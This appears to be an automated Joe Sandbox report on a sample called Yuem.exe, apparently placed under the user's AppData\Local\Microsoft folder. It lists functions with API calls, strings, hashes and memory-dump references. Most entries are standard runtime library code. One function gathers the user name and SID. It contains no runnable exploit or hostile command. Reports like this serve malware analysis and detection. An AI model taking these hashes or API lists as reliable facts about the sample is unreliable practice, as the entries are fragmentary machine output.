Instruction ID: 8350eeb0f752bb370fe28f8662caacaa3cd6f62c8fc788627b4c4e482d24cb39
Opcode Fuzzy Hash: 50ab03ee818e693502a09f6923a7e5a8dc70538bb84ff3834b00985cb395243f
Instruction Fuzzy Hash: 65D19F75D002689FCB15CFE8E8809EDBBB5FF69308F284159E855F7341D631A946CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00D0FD2D Relevance: 9.1, APIs: 6, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 00D0FD6E
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00D0FD76
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00D0FDA0
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00D0FDA9
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00D0FE2C
Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00D0FE34

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
String ID:
API String ID: 3929269971-0
Opcode ID: 2e3574a42e549ebe14ff95a4777ecdf050d4e06661a7a23c891cd89bb28dd310
Instruction ID: e1a3fdbb77f183d8fcf0a144d2799c06c6a1a92a6e4cff6c06f822a4e54f3dc8
Opcode Fuzzy Hash: 2e3574a42e549ebe14ff95a4777ecdf050d4e06661a7a23c891cd89bb28dd310
Instruction Fuzzy Hash: E0413D35A00619EFCB19DF64C454BADB7B5FF88310F148069E50A97791CB34AE41CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D002AF Relevance: 9.1, APIs: 6, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 00D0030C
Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 00D00318
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00D00331
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00D0035F
Concurrency::Context::Block.LIBCONCRT ref: 00D00381

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
String ID:
API String ID: 1182035702-0
Opcode ID: 6282713e340e47f623b170b251994af4103fbce2e252d481c5dc67aad09edfd3
Instruction ID: 98318d9f623578bdff38543bb1cdfbd04f456cc8f63886f060a126f636235df7
Opcode Fuzzy Hash: 6282713e340e47f623b170b251994af4103fbce2e252d481c5dc67aad09edfd3
Instruction Fuzzy Hash: 27215C70800309EBDF65EFA4C8467EEBBB0EF14310F240669E159A62D1EB718A45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D0B476 Relevance: 9.1, APIs: 6, Instructions: 73threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 00D0B4B9

Part of subcall function 00D0C9B0: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 00D0C9FF

GetCurrentThread.KERNEL32 ref: 00D0B4C3
Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00D0B4CF

Part of subcall function 00D017D8: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 00D017EA

Part of subcall function 00D01C64: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 00D01C6B

Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 00D0B512

Part of subcall function 00D0C962: SetEvent.KERNEL32(?,?,00D0B517,00D0C2AB,00000000,?,00000000,00D0C2AB,00000004,00D0C957,?,00000000,?,?,00000000), ref: 00D0C9A6

Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 00D0B51B

Part of subcall function 00D0BF91: List.LIBCONCRT ref: 00D0BFC7

Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 00D0B52B

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedListResourceResource::StateSubscriptionToggle
String ID:
API String ID: 318399070-0
Opcode ID: 5f3a2caec130499bb6b63a5f615c906cb0477697726f0a9c5a063ef6901e7bf1
Instruction ID: c3d0f3a42ef122306045af2e2c09ffd8e4a535748f310f252666fe8c83465fc1
Opcode Fuzzy Hash: 5f3a2caec130499bb6b63a5f615c906cb0477697726f0a9c5a063ef6901e7bf1
Instruction Fuzzy Hash: B4219835500B159FCB24EF64D9909AAF3F4FF48710B004A5EE94AA76A1CB34A905CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00D16387 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00D1637E,00D14F3F,00CFC9A5,8C1FD9F5,?,00000000,00D2D1C8,000000FF,?,00CE232A,?,?), ref: 00D16395
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D163A3
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D163BC
SetLastError.KERNEL32(00000000,?,00D1637E,00D14F3F,00CFC9A5,8C1FD9F5,?,00000000,00D2D1C8,000000FF,?,00CE232A,?,?), ref: 00D1640E

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 2351856cff660da5cd4b095be7c49f34ce2316dfc1de7b7d54c1a0b396039111
Instruction ID: c2e534196b9518fc6de73bcbaf8343c54f72f7e9c3bbf38f9e9b092b525c89ba
Opcode Fuzzy Hash: 2351856cff660da5cd4b095be7c49f34ce2316dfc1de7b7d54c1a0b396039111
Instruction Fuzzy Hash: 7B01D43660D7217FE6242BB4BC95AEA2665EB02375724023AF524C12F9EF61CCC655F0

Uniqueness

Uniqueness Score: -1.00%

Function 00D0106B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 00D01079
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 00D0107F
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 00D010AC
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 00D010B6
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 00D010C8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00D010DE

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID:
API String ID: 2808382621-0
Opcode ID: e1358572745eb684873a6b16f3d128d0c25f52a6907001e408a86d99e2e7f733
Instruction ID: 4faaaa6ea3cc37216c05d93bc6d94f3727643cb37b26129bce38e3c25f5125e8
Opcode Fuzzy Hash: e1358572745eb684873a6b16f3d128d0c25f52a6907001e408a86d99e2e7f733
Instruction Fuzzy Hash: 0D01F239B00249EBCB18AB62DC49BBB37BCEF40750B204424F189D32E1DB20D845D670

Uniqueness

Uniqueness Score: -1.00%

Function 00D1626A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 00D162BD
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00D162D6
PMDtoOffset.LIBCMT ref: 00D162FC

Strings

Bad dynamic_cast!, xrefs: 00D1633E

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: FindInstanceTargetType$Offset
String ID: Bad dynamic_cast!
API String ID: 1467055271-2956939130
Opcode ID: aaa7356c1fedc5d2e1b794571f0537e8ba3e0db214d59811d9ccc7b2881bb93e
Instruction ID: e5a82d329fb0227560bc240f95d27c1b1bbc87d3d0db530f1de25c4feee1810f
Opcode Fuzzy Hash: aaa7356c1fedc5d2e1b794571f0537e8ba3e0db214d59811d9ccc7b2881bb93e
Instruction Fuzzy Hash: 56213672A04204BFCF14DE68FD06EEE77B8EF95720B148229F91093280DF30E98496B4

Uniqueness

Uniqueness Score: -1.00%

Function 00D12C77 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00D12CD2
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00D12CF1
Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00D12D38

Strings

pContext, xrefs: 00D12CE9

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$ExecutionFreeIdleProcessorProxy::Root::SpinSuspendThreadUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1284976207-2046700901
Opcode ID: 7daa6607181b4ee20bd36fd7e9870d19014b61d2c2fd59f5bbf340e321e1ac38
Instruction ID: 848d1eaca1c2246eb74cf5dafb67910b9942c82286731ed9f9dbeb9f255e1dce
Opcode Fuzzy Hash: 7daa6607181b4ee20bd36fd7e9870d19014b61d2c2fd59f5bbf340e321e1ac38
Instruction Fuzzy Hash: D0210531700615AFCB15AB28E891AFC73A6FF94324B04041AE511872D1CF25EDE68BF1

Uniqueness

Uniqueness Score: -1.00%

Function 00D1F3C3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Microsoft\Yuem.exe, xrefs: 00D1F3C8

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Microsoft\Yuem.exe
API String ID: 0-508620602
Opcode ID: 373623ebfc5d8418b6c83b91601732fb02666beb44aede7df7414699858d9f55
Instruction ID: 4b8a46f67f259100ea4017025fccf29ddf86724b13b22c451d76f0e81bbaedd0
Opcode Fuzzy Hash: 373623ebfc5d8418b6c83b91601732fb02666beb44aede7df7414699858d9f55
Instruction Fuzzy Hash: 752192B160420ABF9B20AFA5AC809FB77ADEF443647148624F565D7150EF30DC909BB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D062F2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 00D06351
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00D06374
Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00D063B6

Strings

count, xrefs: 00D0630A
ppVirtualProcessorRoots, xrefs: 00D0636C

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: CacheConcurrency::details::GroupLocalSchedule$Node::ProcessorSchedulingSegmentSegment::Virtualstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 18808576-3650809737
Opcode ID: 9bdcb99e62c4ff60554c2bf9f828b850a44aac8023a7c0e8f7e3699f84385754
Instruction ID: c49ebf934df154d992068a9ff70e3f5c411900bb9be8edad53348209fa1ec22a
Opcode Fuzzy Hash: 9bdcb99e62c4ff60554c2bf9f828b850a44aac8023a7c0e8f7e3699f84385754
Instruction Fuzzy Hash: C621AF35600219AFCB04EF68C981EAD77B5FF48300F144069F60A9B692DF71EA11DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D185E9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 00D1862B

Strings

.cmd, xrefs: 00D18649
.com, xrefs: 00D1866B
.exe, xrefs: 00D18638
.bat, xrefs: 00D1865A

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 37c06035a001788b7f1760eae56ebff73452cf3898bfef6bbd0a9c5b494b2621
Instruction ID: 9b5a0b93155d0e636563a9f9de979d106d3ca0ac1a304dad841793ecd8b4e8de
Opcode Fuzzy Hash: 37c06035a001788b7f1760eae56ebff73452cf3898bfef6bbd0a9c5b494b2621
Instruction Fuzzy Hash: 9401FE77A58611356614A069BC02AE75B99DF96FB0B1E002AF844F71C1DF54DC8261F8

Uniqueness

Uniqueness Score: -1.00%

Function 00D17407 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 00D17457

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-
API String ID: 0-2084034818
Opcode ID: 4ca6b0f180bd54ddc80b3d8d0529bc65f4adf25b2366b6493696bcae88616451
Instruction ID: fc3da116dc48b4e85255c7d1c2ae3c8392737e74a2fd9446aee19c18b996a24c
Opcode Fuzzy Hash: 4ca6b0f180bd54ddc80b3d8d0529bc65f4adf25b2366b6493696bcae88616451
Instruction Fuzzy Hash: 02116331E49325BBDB215B68FC44AAA7B78AB057B0B250510E956EB2B0DF30ED4096F0

Uniqueness

Uniqueness Score: -1.00%

Function 00D134E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

StructuredWorkStealingQueue.LIBCMT ref: 00D13504
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00D13515
StructuredWorkStealingQueue.LIBCMT ref: 00D1354B
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00D1355C

Strings

e, xrefs: 00D13526

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
String ID: e
API String ID: 3804418703-4024072794
Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction ID: e3e3ffb90bf0b59294d15f752f710eb8737c2189b47d8b4727ade6421597907d
Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction Fuzzy Hash: 1B119171204101BBEB14DE6DE8816EFB7A6DF01760B18C169E8069F246DF71EB849BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D179BD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00D179B2,?,?,00D1797A,?,?,?), ref: 00D179D2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D179E5
FreeLibrary.KERNEL32(00000000,?,?,00D179B2,?,?,00D1797A,?,?,?), ref: 00D17A08

Strings

CorExitProcess, xrefs: 00D179DD
mscoree.dll, xrefs: 00D179CB

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 911c1f51e40ffd65d9f5633f104b1775e800f750a1b3b299d90d6a9614f00a47
Instruction ID: 289f5dd5e2d165800d50d23cb23f9fba4e72d564a057d9622f45b036a3e24507
Opcode Fuzzy Hash: 911c1f51e40ffd65d9f5633f104b1775e800f750a1b3b299d90d6a9614f00a47
Instruction Fuzzy Hash: E8F01231905319FBDB129B91ED09BEE7A75EB04756F140054F905E1260CF749E48DAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00CE6A30 Relevance: 7.8, APIs: 5, Instructions: 253COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 00CE6A8A
LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00CE6AD0
GetSidIdentifierAuthority.ADVAPI32(?), ref: 00CE6ADD
GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CE6BF1
GetSidSubAuthority.ADVAPI32(?,00000000), ref: 00CE6C18

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Authority$Name$AccountCountIdentifierLookupUser
String ID:
API String ID: 4230999276-0
Opcode ID: 3f3c1d6d4ababb82ae729ff1cf93aaf4d670ef5a53866e063b50249477588447
Instruction ID: 6e8338de22efd32af9418f998d6f94b7cada3b1e06e18f59c10756fce42e08e6
Opcode Fuzzy Hash: 3f3c1d6d4ababb82ae729ff1cf93aaf4d670ef5a53866e063b50249477588447
Instruction Fuzzy Hash: 6C91C1B1A001589BDB28DF28CC85BEDB779EB45304F4045E9E619D7282DB309BC9CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00D27B89 Relevance: 7.7, APIs: 5, Instructions: 244COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 00D27C2C
__alloca_probe_16.LIBCMT ref: 00D27CE2
__alloca_probe_16.LIBCMT ref: 00D27D78
__freea.LIBCMT ref: 00D27DE3
__freea.LIBCMT ref: 00D27DEF

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

